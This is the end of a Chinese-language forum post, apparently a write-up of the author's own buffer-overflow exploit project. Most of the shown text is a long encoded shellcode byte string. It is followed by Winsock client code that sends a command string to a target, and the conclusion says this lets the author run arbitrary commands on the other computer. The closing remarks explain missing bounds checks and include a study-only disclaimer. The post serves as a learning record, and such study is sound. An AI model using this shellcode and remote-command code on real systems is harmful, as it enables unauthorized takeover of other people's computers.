"\x65\x79\x72\x7B\x24\x25\x39\x73\x7B\x7B\x17\xFF\x17\x17\x17\x17"\
"\x4C\x9E\x4A\xEB\x73\x9C\x22\x27\x17\x17\x17\x9C\x61\x1B\x9C\x61"\
"\x0B\x9C\x21\x9C\x41\x1F\x45\x7F\x90\x25\xCF\xD7\xFF\x29\x17\x17"\
"\x17\x9C\xEF\x9A\x64\xF9\x7D\x17\x7D\x17\x41\xE8\xC0\x9E\x52\xEF"\
"\x9A\x64\xF4\x7D\x17\x7D\x17\x41\xE8\xC0\x9E\x52\xE3\xE8\x62\xE3"\
"\xE8\x62\xEF\xE8\x62\xEB\xFF\xDA\x17\x17\x17\xE8\x62\xEF\x7F\x74"\
"\x9E\xC6\x58\xFF\x10\x17\x17\x17\x7D\x17\xE8\xC7\x9C\xF2\x4A\x42"\
"\x9C\xFB\x94\xFB\x1B\x45\x9C\x5A\x1B\x9C\x56\x2B\x9C\x53\x1F\x6F"\
"\x9C\x6B\x1F\x0B\x14\xEE\x9E\x6A\xEB\x9C\x6B\x1F\x37\x14\xEE\x9E"\
"\x6A\xEF\x9C\x6B\x1F\x33\x14\xEE\x9E\x6A\xE3\x9C\x6B\x1F\x0F\x24"\
"\xDE\xFC\x16\x56\x9C\x62\xEF\x9C\x23\x99\x9C\x42\x1B\x9A\x23\x25"\
"\xE8\x62\x1F\x41\xFF\x36\x17\x17\x17\x94\xEF\x16\x62\xF2\x9C\x62"\
"\xE3\x24\xE8\x71\x9C\x2B\x59\x9C\x42\xEB\x9C\x23\xAD\x9C\x42\x1B"\
"\x9A\x13\x25\x4D\x9C\xF2\x4A\xD5\x1F\x17\x42\x9C\xFB\x94\xFB\x13"\
"\xD0\x52\xEB\x17\x17\x17\x17\x44\x46\x45\x9C\x62\x1F\x24\xDE\x24"\
"\xD7\x9D\x13\x19\x93\xD7\x63\x01\x9C\x4A\xEB\xD6\xF4\x0E\x9C\x42"\
"\xEB\xD6\xFD\x10\x1C\xCD\x14\xCF\x9E\x4A\xEB\x56\xFC\xF4\x9C\x4A"\
"\x1B\x9C\x42\xEB\x24\xD7\x2C\xCD\x62\x12\xAF\x16\x17\x17\x17\x4D"\
"\x4E\x4C\x9C\xF2\x4A\xD5\x1F\x17\x42\x9C\xFB\x96\xFB\x17\x14\x17"\
"\x17\xE8\x62\x07\x7F\x2A\x7D\xA3\x97\xFF\x26\xE8\xE8\xE8\x9A\xA2"\
"\x17\xEA\xE8\xE8\x41\x7F\x15\x15\x17\x17\xE8\xC7\x92\xD7\x18\x92"\
"\x17\x16\x17\x17\xE8\x62\x07\x7F\x3A\x25\x6F\xC9\xFF\x19\xE8\xE8"\
"\xE8\x7D\x17\x7D\x17\x7D\x17\x7D\x11\x7D\x16\x7D\x15\xE8\xC7\x9E"\
"\x52\xEB\xE8\x62\x07\x7F\x73\x07\xB0\xCA\xFF\xE7\xE9\xE8\xE8\x71"\
"\xD0\x92\x17\xE9\xE8\xE8\x15\x17\x71\xD0\x92\x15\xE9\xE8\xE8\x12"\
"\xFC\xD0\x92\x13\xE9\xE8\xE8\x17\x17\x17\x17\x9A\xA2\x17\xE9\xE8"\
"\xE8\x7D\x03\x41\xE8\x62\xEB\xE8\xC7\x92\xD7\x18\x92\xB4\x17\x17"\
"\x17\xE8\x62\x07\x7F\x1B\x88\xC4\x5C\xFF\xA6\xE9\xE8\xE8\x7F\xE8"\
"\xE8\xE8\x68\xE8\x62\xEB\xE8\xC7\x94\xEF\x17\x18\x92\x94\x17\x17"\
"\x17\xE8\x62\x07\x7F\xA6\x09\x80\x16\xFF\x86\xE9\xE8\xE8\x7D\x17"\
"\x7D\x17\xE8\x62\xEB\xE8\xC7\x9E\x52\xEB\xE8\x62\x1B\x7F\xDE\xAB"\
"\xB1\x7C\xFF\x6F\xE9\xE8\xE8\x9C\xC7\x9A\xAA\x67\xE8\xE8\xE8\xAE"\
"\x06\x17\x17\x17\xAF\x17\x17\x17\x17\xEB\xE4\xBC\xD0\x92\x67\xE8"\
"\xE8\xE8\x53\x17\x17\x17\xD0\x52\x8B\x16\x16\x17\x17\x71\xD0\x52"\
"\xB7\x17\x17\x9C\x62\xEB\x9E\x62\xBF\x9E\x62\xBB\x9E\x62\xA7\x9A"\
"\xA2\x67\xE8\xE8\xE8\x9A\xAA\x17\xE9\xE8\xE8\x9C\x4A\x1F\x9A\x4C"\
"\xCC\x40\x41\x7D\x17\x7D\x17\x7D\x17\x7D\x16\x7D\x17\x7D\x17\x44"\
"\x7D\x17\xE8\xC5\x9C\xF2\x4A\xD5\x1B\x17";
recv(stListen, szRecv, sizeof(szRecv), 0);
send(stListen, pCompand, strlen(pCompand), 0);
// 6.接收信息
recv(stListen, szRecv, sizeof(szRecv), 0);
// 7.清理环境
closesocket(stListen);
WSACleanup();
return 0;
}5.结语
1)最后执行结果如下,可以按自己的意愿控制对方电脑执行命令(如创建一个helloworld文件夹)
2)缓冲区溢出一般是没有进行边界检查,或使用了不安全的函数,避免这个情况能大大提高安全性。
3)想要完成漏洞分析,对于出现漏洞的设备或项目有所了解才能顺利完成任务。
4)热爱国家,遵纪守法,仅用于学习,请勿作恶
5)本文记录平日自己写的项目(其中用到的知识来自于15pb,遇到不解处多谢老师指导)
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
最后于 2020-11-27 09:25
被哦哈哈哈哈编辑
,原因:
|
|
|---|---|
|
|
|
